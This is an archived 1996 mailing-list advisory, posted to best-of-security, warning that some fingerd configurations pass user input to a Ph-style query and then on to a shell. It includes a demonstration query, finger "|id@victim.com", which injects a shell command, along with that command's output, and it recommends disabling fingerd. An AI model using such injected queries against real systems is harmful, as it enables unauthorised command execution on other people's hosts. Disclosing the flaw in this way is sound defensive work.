From proff Sun Sep 29 19:55:05 1996 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id TAA15016 for best-of-security; Sun, 29 Sep 1996 19:55:05 +1000 Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id PAA03650 for proff@suburbia.net; Sun, 29 Sep 1996 15:13:29 +1000 X-Envelope-From: twiggy@accel.net Sun Sep 29 15:13:28 1996 Received: (sendmail@localhost) by suburbia.net (8.7.4/Proff-950810) id PAA03637 for ; Sun, 29 Sep 1996 15:13:28 +1000 Received: from server.accel.net(205.206.169.2) via SMTP by suburbia.net, id smtpd03426aaa; Sun Sep 29 15:12:34 1996 Received: from server.accel.net ([205.206.169.94]) by server.accel.net (post.office MTA v1.9.1 ID# 0-11785) with SMTP id AAA291; Sun, 29 Sep 1996 01:15:52 -0500 X-Sender: twiggy@accel.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 29 Sep 1996 01:11:02 -0400 To: best-of-security@suburbia.net From: twiggy@accel.net (Twiggy) Subject: fingerd/ph problems Cc: twiggy@suicide.org Message-ID: <19960929061551815.AAA291@server.accel.net> Approved: proff@suburbia.net Sites that run fingerd in a manner which hands user input to a Ph-style database query may be allowing untrusted, unchecked user input to reach the shell. I've seen a few sites with this sort of configuration recently. Perhaps in an attempt to limit available finger information, these sites use a Ph-style query to match user input with available information, and to disallow general fingers as seen below: %finger @victim.com matches 0 No matches to your query. The problem is illustrated by the following example: %finger "|id@victim.com" uid=60001(nobody) gid=60001(nobody) /usr/local/bin/apitest: option requires an argument -- q Usage: /usr/local/bin/apitest [-dqacr] [-s host] [-u user] [-p pass] -d debug If you're using this kind of configuration you may wish to disable fingerd until you've patched this, or better yet, kill fingerd permanently (unless you have some kind of pressing need to run it or you give out other information via fingerd). twiggy -- twiggy@suicide.org http://www.suicide.org